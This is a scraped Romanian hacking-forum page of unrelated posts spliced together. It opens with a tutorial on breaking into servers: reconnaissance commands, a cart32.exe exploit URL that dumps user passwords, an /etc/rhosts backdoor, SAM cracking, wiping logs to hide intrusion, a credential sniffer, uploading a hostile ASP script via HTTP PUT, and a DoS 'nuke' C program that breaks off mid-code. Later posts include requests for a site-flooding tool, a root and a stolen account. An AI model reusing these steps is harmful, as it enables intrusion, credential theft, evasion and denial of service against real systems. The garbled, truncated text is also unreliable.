Leaderboard

Metode clasice de atac asupra oricarui server Strangerea de informatii este vitala pentru a putea obtine acces pe un server. Voi da in continuare 10 metode de adunare a informatiilor despre server.com. 1)Pentru a afla IP-ul serverului tot ce trebuie sa faceti este tastati: c:/>windows>tracert -j server.com Acum este necesar sa vedem daca are optiunea "file and print share enabled",si daca sistemul de operare este linux sau windows nt. c:/>windows>nbtstat -A ipadress unde ipadress este adresa de IP gasita la pasul anterior. Comanda va lista numele tuturor userilor din memoria cache daca serverul este prost configurat. 2)Trebuie sa aflam serviciile care ruleaza pe server:ftp,telnet,smtp,finger precum si vesiunea lor. c:/>windows>ftp server.com Daca are serviciu ftp va aparea ceva de genul "connected to server running WUFTPD...".Am aflat versiunea de server ftp care ruleaza pe portul 23. Deschidem browserul de web si introducem http://www.server.com/lalalalala.htm. Vom primi un raspuns de genul "file not found on this server.Server running apache.."Am aflat si versiunea serverului pe care sunt stocate paginile web. La fel procedam cu smtp pe portul 25.c:/>windows>telnet qmail.server.com 25 La fel vom primi un mesaj asemanator. Cunoscand toate serviciile care ruleaza pe server si versiunea acestora putem foarte usor gasi un exploit pentru ele. 3)Scanam toate bugurile cunoscute in cgi-bin,cgi-win si scripts. Cel mai bun program care face acest lucru este Cgifound. Spre exemplu un fraier mi-a trimis deunazi un link catre un server vulnerabil si anume www.server.com. Vulnerabilitea consta in programul cart32.exe care se gaseste in cgi-bin.exploitul este: www.server.com/cgi-bin/cart32.exe/cart32clientlist Parola poate fi orice cuvant si toate parolele userilor sunt listate. Este un bug cunoscut pentru cart32.exe. Pentru a vedea insa versiunea de cart32 introduceti in browser: www.server.com/cgi-bin/cart32.exe Foarte multe informatii despre vulnerabilitatile acestui program gasiti pe: www.packetstorm.securify.com tastand in motorul de cautare 'card32' sau 'card'. Este relativ usor sa afli parola unui server, asta o poate face kiddie script insa este mai greu sa nu lasi urme. Si mai greu este sa instalezi un backdoor pe server ca sa poti intra cand doresti. 4)Instalarea unui backdoor pe server se face in functie de sistemul de operare. Pentru Unix: Toti userii care au acces la serer sunt pastrati in fisierul etc/rhosts. Dupa ce am patruns inauntru editam fisierul etc/rhosts in felul urmator: #ed etc/rhosts?somesite.com someuser*w*q Sau mai simplu daca nu cunoasteti Unix este sa descarcati fisierul etc/rhosts si sa adaugati linia:somesite.com semeuser Asta inseamna ca orice utilizator de pe site-ul somesite.com se poate conecta folosind comanda 'rlogin' si userul 'someuser'. Frumos,nu? Pentru NT: Trebuie adaugat un cont in fisierul *.sam folosind programul 'net'.Mai multe amanunte gasiti pe packetstorm.securify.com tastand 'NT'. Evident acest truc este detectabil de administratorul retelei dar temporar este bun pentru ca va ajuta sa obtineti acces la radacina. Spre exemplu sub NT luati fisierele *.sam si decriptati-le. Sub Unix rulati un script care confera drept de root(SuID shell). Apoi dupa ce am obtinut toate parolele si informatiile dorite trebuie sa indepartam orice urma a 'vizitei' noastre pentru ca administratorul sa nu se prinda si sa putem intra oricand. Urmele se sterg indepartand IP-ul nostru din fisierele '*.log'. Sub Unix fisierul etc/inetd.conf contine toate serviciile care ruleaza pe server precum si setarile acestora. Ce s-ar intampla daca modificam temporar aceste setari? 5)O alta metoda cunoscuta de a obtine accesul pe un server este metoda sniffingului. Un sniffer este un program care monitorizeaza traficul pe retea si asculta pe un anume port indicat de utilizator. Cand cineva vrea sa se conecteze la serverul de mail pentru a-si citi mesajele parola si userul sunt interceptate si trimise la persoana care are snifferul in functiune. Un sniffer foarte bun este Buttsniff. Il gasiti pe www.packetstorm.securify.com. Iata cum functioneaza: c:/>buttsniff -l 0 fisier.dmp p fisier.foo Sa analizam putin acesta comanda: fisier.dmp este fisierul care va contine datele capturate de sniffer. Fisierul fisier.foo contine comenzi sau mai bine zis instructiuni. Continutul aproximativ al unui fisier.foo: -----------------------------*.*.*.*122.1.1.4+25---------------------------- Asta inseamna ca este monitorizat serverul 122.1.1.4 pe portul 25 iar celelalte porturi sunt excluse. Un fisier.foo gol inseamna ca vreti sa colectti toate datele care vin/pleaca de la server. Mai multe instructiuni gasiti in fisierul readme.txt. 6)O alta metoda de a obtine acces este metoda numita 'ftp bounch attack' Sa explic foarte pe scurt aceasta metoda: Un server ftp A nu permite acces anonim decat unui server ftp B considerat de incredere, probabil din aceeasi retea. Serverul ftp B are un cont 'guest' activat. Se poate patrunde in A prin B folosind un script cu comenzi ftp ase-manator celui de mai jos: quo "USER annonymous"quo "PASS E-mail "pasv" ...........Mai multe informatii pe astalavista. 7)Odata patrunsi intr-un server ftp trebuie sa stim adresa exacta radacinii, de obicei serverul este instalat pe o ale virtuala. Serverul www.ipswitch.com are aceasta vulnerabilitate: www.ipswitch.com/_vti_pvt/shtml si primim drept raspuns calea exacta si reala a serverului. Acum devine banal: ftp server.comuser:ftppassword:guest dir ---sa vedem la ce avem acces,poate avem acces la cgi-bin-- cd --calea aflata inainte--(c:/inet/root...)put program.exequit O alta vulnerabilitate este comanda PUT. Daca serverul este configurat prost: c:/>windows/telnet server.com 80PUT /scripts/script_ostil.asp HTTP/1.0 --corpul scriptului --/n/n/n Dupa aceea il executam din browser:www.server.com/script/script_ostil.asp. Portul poate sa nu fie 80 ci 8080 sau 8000 depinde de situatie. Trebuie intai sa vedem unde ruleaza pagini web. 9)O alta metoda,de data asta pentru profesionisti este urmarirea datagramelor sau a pachetelor de date care "intra in server". O mare companie a fost atacata in felul acesta cu ajutorul comenzii "SYN". Nu am timp sa dau detalii, poate intr-un alt tutorial, cititi articolele de pe astalavista, tastati 'tcp'. 10) Un program de nuke care intrerupe conexiunea la Internet,care exemplifica conceptul de dos attack. Ideea este ca daemonul care ruleaza pe un anumit port nu poate face fata la cereri repetate. Programul este facut in Borland C++. Compilati-l cu borland c++ ,cu alt compilator nu cred ca merge:nuke.cpp ------------------------------------------- #include <conio.h> #include <stdio.h> #include <winsock.h>struct { int port; char *targetIP; int NumOfAttact, BufSize;} parm;void Pause(void) { cprintf ("Apasati orice tasta pentru a renunta..."); getch(); cprintf ("rn"); } int CheckWinsock() { WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD(1, 1); err = WSAStartup(wVersionRequested, &wsaData); if (err != 0) return err; if ( LOBYTE( wsaData.wVersion ) != 1 || HIBYTE( wsaData.wVersion ) != 1 ) { WSACleanup(); return -1; } return 0; } void ParseIP(char* des, char *theIP) { unsigned int val; char i; for (i = 0; i < 4; i++) { if (*theIP != '

IpTables, grsecurity + pax + rbac, sanitizare memorie, restrictii mprotect(), kernel 2.6.32, pfsense ca si gateway cu cateva configurari aditionale pentru firewall, chroot pe cateva servicii, permisii doar pt. administrator pe /etc/fstab, /etc/password, /etc/shadow si continua...- chattr, crontab cu Clamav, pentru verificari, update-upgrade zilnic.

De ce iti bati cu atata rautate joc de Limba Romana? Ti-ar place daca cineva si-ar bate joc de tine? M-am spalat pe ochi de 3 ori dupa ce am citit topicul acesta.

So 2003-ish )

Pinger,Textplus

Da am deschis aici thread-ul fiindca aici isi are locul. Am decis sa imi inchei activitatea pe aici ( voi sta sa citesc si voi mai ajuta in PM cand voi crede ca este nevoie ) De ce? ( in primul rand nu are legatura cu pozele gasite de un anume user ce avea facebook-ul meu ( care apropo cred ca 80% din cei de pe RST il cunosc.) Mica paranteza: 1. A demonstrat ca e femeie cand a posta pozele fara sa precizeze ca erau in albumul ,,17 ani" 2. Cand am dat poze actuale pe chat ca sa se convinga tot pe alea le-a postat vechi. ( nesimtire + prostie ) 3. E femeie fiindca a stat sa-si faca conturi noi doar ca sa posteze pozele ( daca era baiat posta de pe contu lui ) Asa acum sa va lamuresc de ce ma retrag, Am ajutat fosrte multii useri in PM. Zilnic primeam mesaje cu ,,ma poti ajuta" ,,imi poti explica" " un tutorial,, si multe altele si dupa 1/2 saptamani incepeau sa ma injure ai sa faca troll cand vedeau ca am o discutie cu cineva Nu ma refer doar la o persoana se stiu ei cei care au dat-o in nesimtire. Pe aceasta cale rog un moderator/administrator sa dea TC la thread vreau sa ramana curat. Nu m-au deranjat pozele ci atitudinea unor useri pe care i-am ajutat. In fine am cunoscut si oamenii de treaba pe aici @SynTAX multi altii (majoritatea au plecat) Voi ramane pe RST doar pentru a vedea cum decurg lucrurile... ( voi urmarii thread-urile interesante si voi mai ajuta prin PM persoanele ce le-am ajutat si pana acum ( baietii nu ,,fetele" ) Poate voi revenii ( ma refer sa postez ) in timp dar momentan am luat aceasta decizie. X2:// forumul nu are legatura cu viata personala a utilizatorului apropo.

Iar telenovele. Mai terminati cu siropariile astea! Nu aveti ocupatie sau ce?

data viitoare incearca sa dai cu mail cu tot si crypteaza prin 3 procese ca sa nu i-a cei noobi sau cei nelogati, a fost doar o parere sa dai cu mail

Nenea, a-ti gresit topic-ul.

Care ma poate ajuta cu un ROOT nu conteaza , multumesc .

Salutare tuturor,am decis sa fac un tutorial despre cum putem sa ne optimizam sistemul de operare si intretinerea acestuia. P.S: Acest tutorial este dedicat mai ales incepatorilor. Cuprins tutorial: 1.Eliberarea memoriei nefolositoare. 2.Boot-are mai rapida a sistemului de operare. 3.Intretinerea sistemului de operare. 4.Programe necesare. 1.Eliberarea memoriei nefolositoare! Bun,sa incepem prin eliberarea memoriei de pe partitia C. Avem mai multe metode eu le voi folosi pe cele care ma ajuta mai mult. 1.Stergerea Restore Point-urilor. Avem de urmarit 6 pasi: 1.Click dreapta pe Computer. 2.Properties. 3.In partea stanga alegem optiunea "Advanced system settings." 4.In partea de sus, selectam System Protection. 5.Alegem partitia C si apasam pe butonul Configure 6.Observam cat spatiu ocupat este si apasam pe butonul DELETE. Acuma aveti 2 optiuni: una este sa stergeti de fiecare data aceste restore point-uri sau sa dezactivati sa se mai creeze restore point-uri. 2. Folosirea Disk cleanup Aceasta metoda nu ne va elibera foarte multa memorie dar este eficienta. Avem de urmarit 6 pasi: 1.Apasam pe butonul START. 2.In bara de cautare scriem "Disk cleanup" si deschidem programul. 3.Selectam partitia dorita, in cazul nostru C si apasam pe butonul OK. 4.Dupa selectarea partitiei,programul va incerca sa calculeze cat spatiu poate sa elibereze. 5.Dupa ne va aparea o lista cu ce putem sa stergem,eu am ales Temporary Internet Files", "Service Pack Backup Files" si "Temporary Files". 6.Dupa apasam pe butonul OK -> Delete Files. 3. Folosirea programului CCleaner. Acest program, pe mine unul m-a ajutat foarte mult de-a lungul timpului. Poate fi descarcat de aici: Download CCleaner 5.04.5151 - FileHippo.com Dupa instalare,il deschidem si urmarim pasii: Avem de urmarit 5 pasi: 1.Deschidem programul,alegem din partea stanga butonul "Curatare" si apasam pe "Analizeaza". (Trebuie sa aveti browserele oprite) 2.Dupa ce a analizat o sa ne apara o lista cu ce poate sa stearga si cat spatiu vom castiga. 3.Apasam pe butonul "Ruleaza Cleaner",dupa pe butonul OK 4.Dupa, alegem din partea stanga butonul "Registri" si apasam butonul "Scaneaza pentru probleme". 5.Dupa scanare,apasam pe butonul "Rezolva problemele selectate" si avem posibilitatea sa facem o copie de rezerva a acestor registrii (Eu aleg sa nu faca copie),dupa apasam pe butonul "Rezolva toate problemele selectate" 2.Boot-are mai rapida a sistemului de operare. In partea a doua a acestui tutorial,va voi arata cum putem sa facem ca sistemul nostru de operare sa booteze mai repede. Avem de urmarit 5 pasi: 1.Apasam pe butonul de START si in casuta de cautare scriem "msconfig". (Fara ghilimele) 2.Avem mai multe categorii,prima oara mergem la categoria "Boot" si apasam pe "Advance options". 3.Bifam "Number of processors" si alegem cat este posibil (Valabil pentru cei cu procesoare dual-core,quad-core etc.) 4.Dupa mergem la categoria "Startup" si debifam programele care pornesc odata cu sistemul nostru de operare cum ar fi(Skype,Google Chrome etc). 5.Dupa ce am facut toate acestea apasam pe Apply si Ok. (E nevoie sa restartam sistemul de operare.) !!! Nu debifati programele de care aveti nevoie de exemplu: antivirus,placa audio etc. 3. Intretinerea sistemului de operare. In partea a treia a tutorialului va voi spune cateva sfaturi despre cum putem sa intretinem sistemul de operare.Va voi lasa si cateva programe foarte bune pentru intretinerea unui sistem de operare. Pentru inceput va voi da cateva sfaturi: 1.Dezinstalati programele pe care nu le mai folositi. 2.Rulati o scanare impotriva virusilor macar odata pe saptamana. 3.Folositi programe pentru intretinerea acestuia. 4.Nu lasati sa se descarce/instaleze diverse lucruri care contin virusi. 5.Configurati un Windows Defender pentru o mai buna protectie. 6.Activati un Firewall si configurati-l. 7.Nu descarcati programe ce vi se bar bizare,poate sa fie un Keylogger,virus si asa mai departe. 4. Lista cu programe necesare. Iobit Advanced SystemCare 8 : Speed Up Slow Computer, Keep PC and Internet Secure, Freeware Download - IObit (Unul dintre cele mai bune programe de optimizat si intretinut sistemul de operare.) CCleaner: Download CCleaner 5.04.5151 - FileHippo.com Malwarebytes: Malwarebytes | Internet Security Product Downloads (Unul dintre cele mai bune programe impotriva malwareilor). Cam atata a fost tutorialul, vreau sa va lasati parerile despre acesta,e primul meu tutorial intr-o comunitatea asa mare ca Romanian Security Team.Sper ca am explicat cat de cat bine si daca acest tutorial va primii niste pareri pozitive voi face altele mult mai interesante. Multumesc pentru timpul acordat. Cu stima,JrNasti.PPOW

Stie cineva un program de picat resurse la site-uri de ex dai flood si apare cand intri pe site ceva de genul ca numai are resurse

Salut RST,as avea si eu nevoie de un cont de filelist. Daca ma poate ajuta cineva,astept pm >< Thanks.